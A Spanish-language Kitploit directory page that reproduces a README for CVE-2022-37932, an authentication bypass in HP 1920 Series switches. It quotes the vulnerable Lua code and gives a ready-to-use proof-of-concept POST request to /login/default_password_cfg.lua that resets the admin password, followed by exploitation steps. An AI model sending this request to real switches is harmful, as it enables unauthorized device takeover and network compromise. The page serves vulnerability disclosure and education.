Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-37932 — Exploit de prueba de concepto para un bypass de autenticación en switches HP 1920 Series, que permite cambiar la contraseña de administrador sin autenticación mediante una solicitud HTTP POST manipulada. | Kitploit
Herramientas/GitHubGitHub/tim-hoekstra/cve-2022-37932
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubtim-hoekstra/cve-2022-37932

CVE-2022-37932

Exploit de prueba de concepto para un bypass de autenticación en switches HP 1920 Series, que permite cambiar la contraseña de administrador sin autenticación mediante una solicitud HTTP POST manipulada.

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad de Bypass de Autenticación en Firmware de Switch HP

CVE-2022-37932

Versión de firmware: PD.02.21
Dispositivos afectados: Switches Gestionados Inteligentes Serie HP 1920

Resumen

Este repositorio documenta una vulnerabilidad crítica de bypass de autenticación en los Switches Gestionados Inteligentes Serie HP 1920 que ejecutan la versión de firmware PD.02.21. La vulnerabilidad permite que un atacante no autenticado cambie la contraseña de administrador sin autenticación previa, lo que efectivamente permite la toma completa del dispositivo.

Detalles Técnicos

La vulnerabilidad existe en el script /login/default_password_cfg.lua, que maneja el cambio de la contraseña predeterminada del dispositivo. Este script:

  1. Acepta solicitudes POST de formularios sin verificar si el usuario está autenticado
  2. Solo verifica que el parámetro oldPwd coincida con la contraseña predeterminada (que está en blanco/vacía)
  3. Cambia directamente la contraseña del usuario según los parámetros POST

Código Vulnerable

La sección vulnerable clave en default_password_cfg.lua:

root@kitploit:~
if (request_method == 'POST') then
  -- No authentication or session checks!
  
  local defaultPassword = fpaux.string_const("FD_USER_MGR_DEFAULT_PASSWORD")
  -- ...

  if form_post.oldPwd ~= defaultPassword then
    errorStatus = "401 Unauthorized"
    errorText = label.old_password_mismatch
  else
    -- Proceeds to change password
    -- ...
  end
end

El script carece de controles de seguridad críticos:

  • Sin validación de sesión
  • Sin protección CSRF
  • Sin limitación de velocidad
  • Acceso directo a la funcionalidad de cambio de contraseña sin autenticación

Prueba de Concepto

Un atacante puede explotar esta vulnerabilidad usando una simple solicitud HTTP POST:

root@kitploit:~
POST /login/default_password_cfg.lua HTTP/1.1
Host: [target-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

username=admin&oldPwd=&newPwd=[new-password]&confirmPwd=[new-password]

Nota: El parámetro oldPwd se deja vacío ya que la contraseña predeterminada está en blanco.

Impacto

Esta vulnerabilidad permite que un atacante no autenticado:

  1. Cambie la contraseña de administrador sin conocer ninguna credencial
  2. Obtenga control administrativo completo sobre el dispositivo
  3. Configure el switch, modifique ajustes de red y potencialmente comprometa toda la red

Ruta de Explotación

  1. Localice un switch vulnerable de la Serie HP 1920 en la red
  2. Envíe la solicitud HTTP POST manipulada directamente al dispositivo
  3. La contraseña de administrador se cambia a un valor controlado por el atacante
  4. El atacante ahora puede iniciar sesión con la nueva contraseña y privilegios de administrador completo

Créditos

No he tenido tiempo de investigar quién descubrió originalmente esta vulnerabilidad, solo estoy publicando una Prueba de Concepto.

Aviso Legal

Esta información se proporciona únicamente con fines educativos. El autor no es responsable por el mal uso de esta información. Siempre obtenga la autorización adecuada antes de realizar pruebas de vulnerabilidades.

Descargar herramienta